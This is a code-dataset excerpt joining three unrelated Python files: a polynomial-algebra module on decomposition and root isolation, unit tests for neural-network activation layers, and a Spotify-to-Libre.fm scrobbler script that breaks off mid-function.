return h
@cythonized("u")
def dmp_compose(f, g, u, K):
"""Evaluate functional composition `f(g)` in `K[X]`. """
if not u:
return dup_compose(f, g, K)
if dmp_zero_p(f, u):
return f
h = [f[0]]
for c in f[1:]:
h = dmp_mul(h, g, u, K)
h = dmp_add_term(h, c, 0, u, K)
return h
@cythonized("s,n,r,i,j")
def _dup_right_decompose(f, s, K):
"""XXX"""
n = dup_degree(f)
lc = dup_LC(f, K)
f = dup_to_raw_dict(f)
g = { s : K.one }
r = n // s
for i in xrange(1, s):
coeff = K.zero
for j in xrange(0, i):
if not n+j-i in f:
continue
if not s-j in g:
continue
fc, gc = f[n+j-i], g[s-j]
coeff += (i - r*j)*fc*gc
g[s-i] = K.exquo(coeff, i*r*lc)
return dup_from_raw_dict(g, K)
@cythonized("i")
def _dup_left_decompose(f, h, K):
"""XXX"""
g, i = {}, 0
while f:
q, r = dup_div(f, h, K)
if dup_degree(r) > 0:
return None
else:
g[i] = dup_LC(r, K)
f, i = q, i + 1
return dup_from_raw_dict(g, K)
@cythonized("df,s")
def _dup_decompose(f, K):
"""XXX"""
df = dup_degree(f)
for s in xrange(2, df):
if df % s != 0:
continue
h = _dup_right_decompose(f, s, K)
if h is not None:
g = _dup_left_decompose(f, h, K)
if g is not None:
return g, h
return None
def dup_decompose(f, K):
"""Computes functional decomposition of `f` in `K[x]`.
       Given a univariate polynomial `f` with coefficients in a field of
characteristic zero, returns tuple `(f_1, f_2, ..., f_n)`, where::
f = f_1 o f_2 o ... f_n = f_1(f_2(... f_n))
and `f_2, ..., f_n` are monic and homogeneous polynomials of at
least second degree.
Unlike factorization, complete functional decompositions of
polynomials are not unique, consider examples:
1. `f o g = f(x + b) o (g - b)`
2. `x**n o x**m = x**m o x**n`
3. `T_n o T_m = T_m o T_n`
where `T_n` and `T_m` are Chebyshev polynomials.
References
==========
.. [Kozen89] <NAME>, <NAME>, Polynomial decomposition algorithms,
Journal of Symbolic Computation 7 (1989), pp. 445-456
"""
F = []
while True:
result = _dup_decompose(f, K)
if result is not None:
f, h = result
F = [h] + F
else:
break
return [f] + F
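# Illustrative sketch, not part of the original module: a small functional
# decomposition computed by dup_decompose(). The QQ import path is an
# assumption and may differ between versions.
#
#   from sympy.polys.domains import QQ    # assumed location of the QQ domain
#
#   f = [QQ(1), QQ(0), QQ(2), QQ(0), QQ(0)]    # x**4 + 2*x**2
#   dup_decompose(f, QQ)
#   # expected: [[1, 2, 0], [1, 0, 0]]
#   # i.e. x**4 + 2*x**2 == g(h) with g = x**2 + 2*x and h = x**2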
def dup_sturm(f, K):
"""Computes the Sturm sequence of `f` in `F[x]`.
       Given a univariate, square-free polynomial `f(x)` returns the
associated Sturm sequence `f_0(x), ..., f_n(x)` defined by::
f_0(x), f_1(x) = f(x), f'(x)
f_n = -rem(f_{n-2}(x), f_{n-1}(x))
References
==========
.. [Davenport88] <NAME>, <NAME>, <NAME>,
Computer Algebra Systems and Algorithms for Algebraic
Computation, Academic Press, London, 1988, pp. 124-128
"""
if not K.has_Field:
raise DomainError('computation can be done only in a field')
f = dup_sqf_part(f, K)
sturm = [f, dup_diff(f, 1, K)]
while sturm[-1]:
s = dup_rem(sturm[-2], sturm[-1], K)
sturm.append(dup_neg(s, K))
return sturm[:-1]
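# Illustrative sketch, not part of the original module: a Sturm chain over QQ
# and the classical sign-variation root count it supports. The QQ import path
# is an assumption and may differ between versions.
#
#   from sympy.polys.domains import QQ    # assumed location of the QQ domain
#
#   f = [QQ(1), QQ(0), QQ(-1)]            # x**2 - 1
#   dup_sturm(f, QQ)                      # [x**2 - 1, 2*x, 1] as dense lists
#
# Evaluating the chain at two points a < b and counting sign changes with
# dup_sign_variations() (defined below) gives the number of distinct real
# roots in (a, b]: here V(-2) - V(2) == 2 - 0 == 2.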
@cythonized("u")
def dmp_lift(f, u, K):
"""Convert algebraic coefficients to integers in `K[X]`. """
if not K.is_Algebraic:
raise DomainError('computation can be done only in an algebraic domain')
F, monoms, polys = dmp_to_dict(f, u), [], []
for monom, coeff in F.iteritems():
if not coeff.is_ground:
monoms.append(monom)
perms = variations([-1, 1], len(monoms), repetition=True)
for perm in perms:
G = dict(F)
for sign, monom in zip(perm, monoms):
if sign == -1:
G[monom] = -G[monom]
polys.append(dmp_from_dict(G, u, K))
return dmp_convert(dmp_expand(polys, u, K), u, K, K.dom)
def dup_sign_variations(f, K):
"""Compute the number of sign variations of `f` in `K[x]`. """
prev, k = K.zero, 0
for coeff in f:
if coeff*prev < 0:
k += 1
if coeff:
prev = coeff
return k
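# Illustrative sketch, not part of the original module: sign variations of a
# dense coefficient list, the quantity behind Descartes' rule of signs and the
# root isolation code below. The ZZ import path is an assumption.
#
#   from sympy.polys.domains import ZZ    # assumed location of the ZZ domain
#
#   dup_sign_variations([ZZ(1), ZZ(-3), ZZ(2)], ZZ)   # 2   (x**2 - 3*x + 2)
#   dup_sign_variations([ZZ(1), ZZ(0), ZZ(-4)], ZZ)   # 1   (zeros are skipped)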
def dup_root_upper_bound(f, K):
"""Compute LMQ upper bound for `f`'s positive roots. """
n, t, P = len(f), K.one, []
if dup_LC(f, K) < 0:
f = dup_neg(f, K)
f = list(reversed(f))
for i in xrange(0, n):
if f[i] >= 0:
continue
a, Q = K.log(-f[i], 2), []
for j in xrange(i+1, n):
if f[j] <= 0:
continue
q = t + a - K.log(f[j], 2)
Q.append(q // (j - i))
t += 1
if not Q:
continue
P.append(min(Q))
if not P:
return None
else:
return 2.0**(max(P)+1)
def dup_root_lower_bound(f, K):
"""Compute LMQ lower bound for `f`'s positive roots. """
bound = dup_root_upper_bound(dup_reverse(f), K)
if bound is not None:
return 1.0 / bound
else:
return None
def dup_inner_refine_real_root(f, (a, b, c, d), cond, fast, K):
"""Refine a positive root of `f` given a Mobius transform. """
F, i = K.get_field(), 0
while not c or not cond(a, b, c, d, i, F):
A = dup_root_lower_bound(f, K)
if A is not None:
A = K(int(A))
else:
A = K.zero
if fast and A > 16:
f = dup_scale(f, A, K)
a, c, A = A*a, A*c, K.one
if A >= K.one:
f = dup_taylor(f, A, K)
b, d = A*a + b, A*c + d
if not dup_eval(f, K.zero, K):
return F(b, d), F(b, d)
f, g = dup_taylor(f, K.one, K), f
a1, b1, c1, d1 = a, a+b, c, c+d
if not dup_eval(f, K.zero, K):
return F(b1, d1), F(b1, d1)
k = dup_sign_variations(f, K)
if k == 1:
a, b, c, d = a1, b1, c1, d1
else:
f = dup_taylor(dup_reverse(g), K.one, K)
if not dup_eval(f, K.zero, K):
f = dup_rshift(f, 1, K)
a, b, c, d = b, a+b, d, c+d
i += 1
s, t = F(a, c), F(b, d)
if s <= t:
return (s, t)
else:
return (t, s)
def dup_outer_refine_real_root(f, s, t, cond, fast, K):
"""Refine a positive root of `f` given an interval `(s, t)`. """
if s == t:
return (s, t)
F = K.get_field()
a, c = F.numer(s), F.denom(s)
b, d = F.numer(t), F.denom(t)
f = dup_transform(f, dup_strip([a, b]),
dup_strip([c, d]), K)
if dup_sign_variations(f, K) != 1:
raise RefinementFailed("there should be exactly one root on (%s, %s)" % (s, t))
return dup_inner_refine_real_root(f, (a, b, c, d), cond, fast, K)
def dup_refine_real_root(f, s, t, n, K, **args):
"""Refine real root's approximating interval to the given precision. """
if K.is_QQ:
(_, f), K = dup_ground_to_ring(f, K, convert=True), K.get_ring()
elif not K.is_ZZ:
raise DomainError("real root refinement not supported over %s" % K)
if s == t:
return (s, t)
if s > t:
s, t = t, s
negative = False
if s < 0:
if t <= 0:
f, s, t, negative = dup_mirror(f, K), -t, -s, True
else:
raise ValueError("can't refine a real root on (%s, %s)" % (s, t))
fast = args.get('fast')
if type(n) is not int:
cond = lambda a, b, c, d, i, F: abs(F(a, c) - F(b, d)) < n
else:
cond = lambda a, b, c, d, i, F: i >= n
s, t = dup_outer_refine_real_root(f, s, t, cond, fast, K)
if negative:
return (-t, -s)
else:
return ( s, t)
def dup_inner_isolate_real_roots(f, cond, fast, K):
"""Iteratively compute disjoint positive root isolation intervals. """
a, b, c, d = K.one, K.zero, K.zero, K.one
k = dup_sign_variations(f, K)
if k == 0:
return []
if k == 1:
roots = [dup_inner_refine_real_root(
f, (a, b, c, d), cond, fast, K)]
else:
roots, stack = [], [(a, b, c, d, f, k)]
F = K.get_field()
while stack:
a, b, c, d, f, k = stack.pop()
A = dup_root_lower_bound(f, K)
if A is not None:
A = K(int(A))
else:
A = K.zero
if fast and A > 16:
f = dup_scale(f, A, K)
a, c, A = A*a, A*c, K.one
if A >= K.one:
f = dup_taylor(f, A, K)
b, d = A*a + b, A*c + d
if not dup_eval(f, K.zero, K):
roots.append((F(b, d), F(b, d)))
f = dup_rshift(f, 1, K)
k = dup_sign_variations(f, K)
if k == 0:
continue
if k == 1:
roots.append(dup_inner_refine_real_root(
f, (a, b, c, d), cond, fast, K))
continue
f1 = dup_taylor(f, K.one, K)
a1, b1, c1, d1, r = a, a+b, c, c+d, 0
if not dup_eval(f1, K.zero, K):
roots.append((F(b1, d1), F(b1, d1)))
f1, r = dup_rshift(f1, 1, K), 1
k1 = dup_sign_variations(f1, K)
k2 = k - k1 - r
a2, b2, c2, d2 = b, a+b, d, c+d
if k2 > 1 or (k1 > 0 and k2 == 1):
f2 = dup_taylor(dup_reverse(f), K.one, K)
if not dup_eval(f2, K.zero, K):
f2 = dup_rshift(f2, 1, K)
k2 = dup_sign_variations(f2, K)
if k1 < k2:
a1, a2, b1, b2 = a2, a1, b2, b1
c1, c2, d1, d2 = c2, c1, d2, d1
f1, f2, k1, k2 = f2, f1, k2, k1
if k1 == 0:
continue
if k1 == 1:
roots.append(dup_inner_refine_real_root(
f1, (a1, b1, c1, d1), cond, fast, K))
else:
stack.append((a1, b1, c1, d1, f1, k1))
if k2 == 0:
continue
if k2 == 1:
roots.append(dup_inner_refine_real_root(
f2, (a2, b2, c2, d2), cond, fast, K))
else:
stack.append((a2, b2, c2, d2, f2, k2))
return sorted(roots)
def dup_isolate_real_roots(f, K, **args):
"""Isolate real roots using continued fractions approach. """
if K.is_QQ:
(_, f), K = dup_ground_to_ring(f, K, convert=True), K.get_ring()
elif not K.is_ZZ:
raise DomainError("isolation of real roots not supported over %s" % K)
if dup_degree(f) <= 0:
return []
eps, fast = args.get('eps'), args.get('fast')
if eps is not None:
cond = lambda a, b, c, d, i, F: abs(F(a, c) - F(b, d)) < eps
else:
cond = lambda a, b, c, d, i, F: True
if args.get('sqf', False):
I_pos = dup_inner_isolate_real_roots(f, cond, fast, K)
f = dup_mirror(f, K)
I_neg = dup_inner_isolate_real_roots(f, cond, fast, K)
return sorted([ (-v, -u) for (u, v) in I_neg ] + I_pos)
_, factors = dup_sqf_list(f, K)
if len(factors) == 1:
((f, k),) = factors
I_pos = dup_inner_isolate_real_roots(f, cond, fast, K)
f = dup_mirror(f, K)
I_neg = dup_inner_isolate_real_roots(f, cond, fast, K)
return sorted([ ((-v, -u), k) for (u, v) in I_neg ] + \
[ (( u, v), k) for (u, v) in I_pos ])
I_pos, I_neg = [], []
F_pos, F_neg = {}, {}
for f, k in factors:
for u, v in dup_inner_isolate_real_roots(f, cond, fast, K):
I_pos.append((u, v, k))
g = dup_mirror(f, K)
for s, t in dup_inner_isolate_real_roots(g, cond, fast, K):
I_neg.append((s, t, k))
F_pos[k], F_neg[k] = f, g
step = lambda a, b, c, d, i, F: i >= 1
for i, (u, v, k) in enumerate(I_pos):
for j, (s, t, m) in enumerate(I_pos[i+1:]):
while not (s >= v or t <= u):
u, v = dup_outer_refine_real_root(F_pos[k], u, v, step, fast, K)
s, t = dup_outer_refine_real_root(F_pos[m], s, t, step, fast, K)
I_pos[i+j+1] = (s, t, m)
I_pos[i] = (u, v, k)
for i, (u, v, k) in enumerate(I_neg):
for j, (s, t, m) in enumerate(I_neg[i+1:]):
while not (s >= v or t <= u):
u, v = dup_outer_refine_real_root(F_neg[k], u, v, step, fast, K)
s, t = dup_outer_refine_real_root(F_neg[m], s, t, step, fast, K)
I_neg[i+j+1] = (s, t, m)
I_neg[i] = (u, v, k)
return sorted([ ((-v, -u), k) for (u, v, k) in I_neg ] + \
[ (( u, v), k) for (u, v, k) in I_pos ])
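# Illustrative sketch, not part of the original module: isolating the real
# roots of x**2 - 2 over ZZ. The ZZ import path is an assumption, and the
# exact isolating intervals depend on the internal continued-fraction steps,
# so only the shape of the result is shown.
#
#   from sympy.polys.domains import ZZ    # assumed location of the ZZ domain
#
#   f = [ZZ(1), ZZ(0), ZZ(-2)]            # x**2 - 2
#   dup_isolate_real_roots(f, ZZ)
#   # -> [((s1, t1), 1), ((s2, t2), 1)] : two disjoint rational intervals,
#   #    one containing -sqrt(2) and one containing sqrt(2), multiplicity 1.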
def _dup_inner_sturm(f, p, q, x, y, K):
"""Compute Sturm sequence at x+I*y in p+I*q direction. """
C = K.complex_domain()
a, b = C(p, q), C(x, y)
f = dup_convert(f, K, C)
f = dup_taylor(f, b, C)
f = dup_scale(f, a, C)
u = dup_strip([ C.real(c) for c in f ])
v = dup_strip([ C.imag(c) for c in f ])
seq = [u, v]
while seq[-1]:
s = dup_rem(seq[-2], seq[-1], K)
seq.append(dup_neg(s, K))
return seq[:-1]
def _dup_sturm_shift(F, c, K):
"""Shift origin of a Sturm sequence by a real number `c`. """
return [ dup_taylor(f, c, K) for f in F ]
def _dup_sturm_mirror(F, K):
"""Flip the direction of a Sturm sequence at its origin. """
return [ dup_mirror(f, K) for f in F ]
def _dup_inner_zeros(F1, F2, F3, F4, hx, hy, K):
"""Return the exact number of zeros in the given rectangle. """
V1 = [
dup_sign_variations([ dup_eval(f, hx, K) for f in F1 ], K),
dup_sign_variations([ dup_eval(f, hy, K) for f in F2 ], K),
dup_sign_variations([ dup_eval(f, hx, K) for f in F3 ], K),
dup_sign_variations([ dup_eval(f, hy, K) for f in F4 ], K),
]
V0 = [
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F1 ], K),
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F2 ], K),
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F3 ], K),
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F4 ], K),
]
return sum(v1 - v0 for v1, v0 in zip(V1, V0)) // 2
def dup_inner_refine_complex_root(f, x, y, dx, dy, F, K):
"""One bisection step of complex root refinement algorithm. """
hx, hy = dx/2, dy/2
cx, cy = x + hx, y + hy
F1, F2, F3, F4 = F
Fx = _dup_inner_sturm(f, K.one, K.zero, cx, cy, K)
Fy = _dup_inner_sturm(f, K.zero, K.one, cx, cy, K)
# Quadrant #1: ++
F11 = Fx
F12 = _dup_sturm_shift(F2, hx, K)
F13 = F3
F14 = _dup_sturm_mirror(_dup_sturm_shift(Fy, hy, K), K)
k1 = _dup_inner_zeros(F11, F12, F13, F14, hx, hy, K)
if k1 == 1:
return (cx, cy, hx, hy, (F11, F12, F13, F14))
# Quadrant #2: -+
F21 = _dup_sturm_shift(Fx,-hx, K)
F22 = Fy
F23 = _dup_sturm_shift(F3, hx, K)
F24 = F4
k2 = _dup_inner_zeros(F21, F22, F23, F24, hx, hy, K)
if k2 == 1:
return (x, cy, hx, hy, (F21, F22, F23, F24))
# Quadrant #3: --
F31 = F1
F32 = _dup_sturm_shift(Fy,-hy, K)
F33 = _dup_sturm_mirror(Fx, K)
F34 = _dup_sturm_shift(F4, hy, K)
k3 = _dup_inner_zeros(F31, F32, F33, F34, hx, hy, K)
if k3 == 1:
return (x, y, hx, hy, (F31, F32, F33, F34))
# Quadrant #4: +-
F41 = _dup_sturm_shift(F1, hx, K)
F42 = F2
F43 = _dup_sturm_mirror(_dup_sturm_shift(Fx, hx, K), K)
F44 = _dup_sturm_mirror(Fy, K)
k4 = _dup_inner_zeros(F41, F42, F43, F44, hx, hy, K)
if k4 == 1:
return (cx, y, hx, hy, (F41, F42, F43, F44))
raise RefinementFailed("no roots in (%s, %s) x (%s, %s) rectangle" % (x, y, x+dx, y+dy))
def dup_outer_refine_complex_root(f, x, y, dx, dy, F, eps, K):
"""Refine a complex root until the desired precision is reached. """
while dx >= eps and dy >= eps:
x, y, dx, dy, F = dup_inner_refine_complex_root(f, x, y, dx, dy, F, K)
return x, y, dx, dy, F
def dup_refine_complex_root(f, x, y, dx, dy, eps, K):
"""Refine a complex root using Wilf's global bisection algorithm. """
if K.is_ZZ or K.is_QQ:
K0, K = K, K.float_domain()
f = dup_convert(f, K0, K)
else:
raise DomainError("isolation of complex roots not supported over %s" % K)
F1 = _dup_inner_sturm(f, K.one, K.zero, x, y, K)
F2 = _dup_inner_sturm(f, K.zero, K.one, x+dx, y, K)
F3 = _dup_inner_sturm(f,-K.one, K.zero, x+dx, y+dy, K)
F4 = _dup_inner_sturm(f, K.zero,-K.one, x, y+dy, K)
F = (F1, F2, F3, F4)
x, y, dx, dy, _ = dup_outer_refine_complex_root(f, x, y, dx, dy, F, eps, K)
return x, y, dx, dy
def dup_inner_isolate_complex_roots(f, K, **args):
"""Compute disjoint complex root isolating rectangles for all quadrants. """
n, lc = dup_degree(f), abs(dup_LC(f, K))
B = 2*max(abs(c)/lc for c in f)
while True:
r = randfloat()
if r < 0.5:
break
x, y, dx, dy = -B+r, -B-r, 2*B+r, 2*B+r
roots, stack = [], []
F1 = _dup_inner_sturm(f, K.one, K.zero, x, y, K)
F2 = _dup_inner_sturm(f, K.zero, K.one, x+dx, y, K)
F3 = _dup_inner_sturm(f,-K.one, K.zero, x+dx, y+dy, K)
F4 = _dup_inner_sturm(f, K.zero,-K.one, x, y+dy, K)
k = _dup_inner_zeros(F1, F2, F3, F4, dx, dy, K)
if k != n:
return dup_inner_isolate_complex_roots(f, K)
if k == 1:
roots.append((x, y, dx, dy, (F1, F2, F3, F4)))
elif k > 1:
stack.append((x, y, dx, dy, k, F1, F2, F3, F4))
while stack:
x, y, dx, dy, k, F1, F2, F3, F4 = stack.pop()
hx, hy = dx/2, dy/2
cx, cy = x + hx, y + hy
Fx = _dup_inner_sturm(f, K.one, K.zero, cx, cy, K)
Fy = _dup_inner_sturm(f, K.zero, K.one, cx, cy, K)
# Quadrant #1: ++
F11 = Fx
F12 = _dup_sturm_shift(F2, hx, K)
F13 = F3
F14 = _dup_sturm_mirror(_dup_sturm_shift(Fy, hy, K), K)
k1 = _dup_inner_zeros(F11, F12, F13, F14, hx, hy, K)
if k1 == 1:
roots.append((cx, cy, hx, hy, (F11, F12, F13, F14)))
elif k1 > 1:
stack.append((cx, cy, hx, hy, k1, F11, F12, F13, F14))
# Quadrant #2: -+
F21 = _dup_sturm_shift(Fx,-hx, K)
F22 = Fy
F23 = _dup_sturm_shift(F3, hx, K)
F24 = F4
k2 = _dup_inner_zeros(F21, F22, F23, F24, hx, hy, K)
if k2 == 1:
roots.append((x, cy, hx, hy, (F21, F22, F23, F24)))
elif k2 > 1:
stack.append((x, cy, hx, hy, k2, F21, F22, F23, F24))
# Quadrant #3: --
F31 = F1
F32 = _dup_sturm_shift(Fy,-hy, K)
F33 = _dup_sturm_mirror(Fx, K)
F34 = _dup_sturm_shift(F4, hy, K)
k3 = _dup_inner_zeros(F31, F32, F33, F34, hx, hy, K)
if k3 == 1:
roots.append((x, y, hx, hy, (F31, F32, F33, F34)))
elif k3 > 1:
stack.append((x, y, hx, hy, k3, F31, F32, F33, F34))
# Quadrant #4: +-
F41 = _dup_sturm_shift(F1, hx, K)
F42 = F2
F43 = _dup_sturm_mirror(_dup_sturm_shift(Fx, hx, K), K)
F44 = _dup_sturm_mirror(Fy, K)
k4 = _dup_inner_zeros(F41, F42, F43, F44, hx, hy, K)
if k4 == 1:
roots.append((cx, y, hx, hy, (F41, F42, F43, F44)))
elif k4 > 1:
stack.append((cx, y, hx, hy, k4, F41, F42, F43, F44))
if len(roots) == n:
eps = args.get('eps')
if eps is not None:
for i, (x, y, dx, dy, F) in enumerate(roots):
roots[i] = dup_outer_refine_complex_root(f, x, y, dx, dy, F, eps, K)
return roots
else:
return dup_inner_isolate_complex_roots(f, K)
def dup_isolate_complex_roots(f, K, **args):
"""Isolate complex roots using Wilf's global bisection algorithm. """
if K.is_ZZ or K.is_QQ:
F = K.float_domain()
else:
raise DomainError("isolation of complex roots not supported over %s" % K)
squarefree = args.get('sqf', False)
if squarefree:
roots = dup_inner_isolate_complex_roots(dup_convert(f, K, F), F, **args)
else:
roots = []
_, factors = dup_sqf_list(f, K)
for g, k in factors:
g = dup_convert(g, K, F)
for r in dup_inner_isolate_complex_roots(g, F, **args):
roots.append((g, r, k))
if len(factors) > 1:
for i, (f1, r1, k1) in enumerate(roots):
x1, y1, dx1, dy1, F1 = r1
for j, (f2, r2, k2) in enumerate(roots[i+1:]):
x2, y2, dx2, dy2, F2 = r2
while not ((x2 >= x1+dx1 or x2+dx2 <= x1) and (y2 >= y1+dy1 or y2+dy2 <= y1)):
x1, y1, dx1, dy1, F1 = dup_inner_refine_complex_root(f1, x1, y1, dx1, dy1, F1, K)
                        x2, y2, dx2, dy2, F2 = dup_inner_refine_complex_root(f2, x2, y2, dx2, dy2, F2, K)
roots[i+j+1] = (f2, (x2, y2, dx2, dy2, F2), k2)
roots[i] = (f1, (x1, y1, dx1, dy1, F1), k1)
multiplicity = {}
for (_, (x, y, dx, dy, _), k) in roots:
multiplicity[(x, y, dx, dy)] = k
roots = multiplicity.keys()
groups = {}
for (x, y, dx, dy) in roots:
if x in groups:
groups[x].append((x, y, dx, dy))
else:
groups[x] = [(x, y, dx, dy)]
upper, lower = [], []
for group in groups.values():
while len(group) > 1:
_max = max([ r[1] for r in group ])
for i, (x, y, dx, dy) in enumerate(group):
if y == _max:
upper.append((x, y, dx, dy))
del group[i]
break
_min = min([ r[1] for r in group ])
for i, (x, y, dx, dy) in enumerate(group):
if y == _min:
lower.append((x, y, dx, dy))
del group[i]
break
upper = sorted(upper, key=lambda r: r[0])
lower = sorted(lower, key=lambda r: r[0])
if not squarefree:
for i, r in enumerate(upper):
upper[i] = (r, multiplicity[r])
for i, r in enumerate(lower):
lower[i] = (r, multiplicity[r])
return upper, lower
| 1.867188 | 2 |
tests/test_layers/test_activation.py | wkcn/mobula | 47 | 12795712 | import mobula.layers as L
import numpy as np
def test_sigmoid():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.Sigmoid(data)
l.reshape()
assert l.Y.shape == X.shape
l.forward()
l.dY = np.random.random(l.Y.shape) * 10
l.backward()
enx = np.exp(-X)
assert np.allclose(l.Y.ravel(), (1.0 / (1.0 + enx)).ravel())
assert np.allclose(l.dX.ravel(), (enx / np.square(1 + enx) * l.dY).ravel())
def test_relu():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.ReLU(data)
l.reshape()
assert l.Y.shape == X.shape
l.forward()
l.dY = np.random.random(l.Y.shape) * 10
l.backward()
Y = np.zeros(X.shape)
b = (X > 0)
Y[b] = X[b]
dX = np.zeros(X.shape)
dX[b] = l.dY[b]
'''
d = (l.dX != dX)
print (l.dX[d], dX[d])
'''
assert np.allclose(l.Y.ravel(), Y.ravel())
assert np.allclose(l.dX.ravel(), dX.ravel())
def test_selu():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.SELU(data)
y = l.eval()
ty = np.zeros(X.shape)
ty[X > 0] = l.scale * X[X>0]
ty[X<=0] = l.scale * (l.alpha * np.exp(X[X<=0]) - l.alpha)
assert np.allclose(y, ty)
l.dY = np.random.random(l.Y.shape)
l.backward()
dX = np.zeros(X.shape)
dX[X > 0] = l.scale
dX[X <= 0] = l.scale * l.alpha * np.exp(X[X<=0])
dX *= l.dY
assert np.allclose(dX, l.dX)
def test_PReLU():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.PReLU(data)
y = l.eval()
ty = np.zeros(X.shape)
ty[X>0] = X[X>0]
ty[X<=0] = l.alpha * X[X<=0]
assert np.allclose(y, ty)
l.dY = np.random.random(l.Y.shape)
l.backward()
dX = np.zeros(X.shape)
dX[X>0] = 1
dX[X<=0] = l.alpha
dX *= l.dY
print (dX, l.dX)
assert np.allclose(dX, l.dX)
def test_tanh():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.Tanh(data)
y = l.eval()
p = np.exp(X)
n = np.exp(-X)
ty = (p - n) / (p + n)
assert np.allclose(y, ty)
l.dY = np.random.random(l.Y.shape)
l.backward()
dX = 1.0 - np.square(p - n) / np.square(p + n)
dX *= l.dY
assert np.allclose(dX, l.dX)
| 3.0625 | 3 |
sls.py | yyyyyyyan/spotify-libre-scrobbler | 0 | 12795713 | <reponame>yyyyyyyan/spotify-libre-scrobbler
import os
import pickle
import sys
from argparse import ArgumentParser
from configparser import ConfigParser
from datetime import datetime
from getpass import getpass
from hashlib import md5
from math import ceil
from pylast import LibreFMNetwork, SessionKeyGenerator, WSError
from spotipy import Spotify, SpotifyOAuth
def hash_librefm_password(password):
return md5(password.encode("utf8")).hexdigest()
def init_config(**kwargs):
config_filename = kwargs["config_file"]
config = ConfigParser()
print(
"Follow the instructions and enter the requested information to create the config file\n"
)
spotify_conf = dict()
print("-" * 27)
print("Configuring Spotify API:\n")
print(
"1 - Create an app on Spotify for Developers (https://developer.spotify.com/dashboard/applications)"
)
print("2 - Input the following information (available on the app page):")
spotify_conf["client_id"] = input("Client ID: ")
spotify_conf["client_secret"] = input("Client Secret: ")
print(
"3 - On the app page, click on Edit Settings, enter a URI on the Redirect URIs field and save. (Note: the URI doesn't need to be accessible. By default we use http://localhost)"
)
print("4 - Input the following information:")
spotify_conf["redirect_uri"] = (
input("Redirect URI [http://localhost]: ") or "http://localhost"
)
spotify_conf["username"] = input("Spotify username: ")
config["spotify"] = spotify_conf
librefm_conf = dict()
print("-" * 27)
print("Configuring Libre.fm API:\n")
librefm_conf["username"] = input("Libre.fm username: ")
librefm_conf["password_hash"] = hash_librefm_password(
getpass("Libre.fm password: ")
)
config["libre.fm"] = librefm_conf
print("-" * 27)
print(f"Saving config to {config_filename}")
with open(config_filename, "w") as config_file:
config.write(config_file)
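# Illustrative sketch, not part of the original script: the shape of the
# config.ini written by init_config(). The values are placeholders, not real
# credentials.
#
#   [spotify]
#   client_id = <your-client-id>
#   client_secret = <your-client-secret>
#   redirect_uri = http://localhost
#   username = <your-spotify-username>
#
#   [libre.fm]
#   username = <your-librefm-username>
#   password_hash = <md5-hash-of-your-password>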
def save_tracks(filename, tracks):
with open(filename, "wb") as pickle_file:
pickle.dump(tracks, pickle_file, pickle.HIGHEST_PROTOCOL)
def main(**kwargs):
config_file = kwargs["config"]
if len(sys.argv) <= 2 and not os.path.isfile(config_file):
print(f"Default config file ({config_file}) not found and no arguments passed")
print("Run the following command to generate a config file:")
print(f"\t{sys.argv[0]} init")
sys.exit(1)
config = ConfigParser()
if os.path.isfile(config_file):
config.read(config_file)
else:
config["spotify"] = dict()
config["libre.fm"] = dict()
try:
auth = SpotifyOAuth(
kwargs["spotify_client_id"] or config["spotify"]["CLIENT_ID"],
kwargs["spotify_client_secret"] or config["spotify"]["CLIENT_SECRET"],
kwargs["spotify_redirect_uri"] or config["spotify"]["REDIRECT_URI"],
username=kwargs["spotify_user"] or config["spotify"]["USERNAME"],
cache_path=kwargs["cache_path"] or config["spotify"]["CACHE_PATH"],
scope="user-read-recently-played",
)
except KeyError as err:
print(f"Missing Spotify config/parameter {err}")
sys.exit(1)
if kwargs["force_refresh_token"]:
auth.refresh_access_token(auth.get_cached_token()["refresh_token"])
spotify = Spotify(auth_manager=auth)
print("Searching recent tracks")
if kwargs["search_after"]:
last_timestamp = int(
datetime.strptime(
kwargs["search_after"], kwargs["search_after_fmt"]
).timestamp()
* 1000
)
else:
last_timestamp = kwargs["last_timestamp"] or config["spotify"].get(
"LAST_TIMESTAMP"
)
recent_tracks = spotify.current_user_recently_played(after=last_timestamp)
cursors = recent_tracks["cursors"]
last_timestamp = cursors["after"] if cursors is not None else last_timestamp
config["spotify"]["LAST_TIMESTAMP"] = last_timestamp
tracks_file = kwargs["tracks_file"]
spotify_tracks = recent_tracks["items"]
if kwargs["scrobble_remaining"] and os.path.isfile(tracks_file):
with open(tracks_file, "rb") as pickle_file:
spotify_tracks.extend(pickle.load(pickle_file))
print(f"Found {len(spotify_tracks)} tracks to scrobble!")
print("Organizing tracks...")
tracks = []
for track in spotify_tracks:
try:
track_info = {
"artist": track["track"]["artists"][0]["name"],
"title": track["track"]["name"],
"album": track["track"]["album"]["name"],
"track_number": track["track"].get("track_number"),
"duration": ceil(track["track"]["duration_ms"] / 1000),
"timestamp": int(
datetime.strptime(
track["played_at"], "%Y-%m-%dT%H:%M:%S.%f%z"
).timestamp()
),
}
tracks.append(track_info)
except Exception as err:
print("Error reading track metadata")
print(err)
print(track)
print(f"Saving non-scrobbled tracks to {tracks_file}")
save_tracks(tracks_file, spotify_tracks)
sys.exit(1)
librefm_auth = {key.lower(): value for key, value in config["libre.fm"].items()}
librefm_auth["username"] = kwargs["librefm_user"] or librefm_auth["username"]
librefm_auth["password_hash"] = (
hash_librefm_password(kwargs["librefm_password"])
if kwargs["librefm_password"]
else librefm_auth["password_hash"]
)
if tracks:
tries = 10
while tries:
tries -= 1
librefm = LibreFMNetwork(**librefm_auth)
print("Scrobbling tracks...")
try:
librefm.scrobble_many(tracks)
except WSError:
print(f"Error: Invalid session! {tries} tries remaining")
print("Getting new session...")
skg = SessionKeyGenerator(librefm)
url = skg.get_web_auth_url()
print(f"Authorize the app: {url}")
input("Press ENTER when done")
session_key = skg.get_web_auth_session_key(url)
librefm_auth["session_key"] = session_key
else:
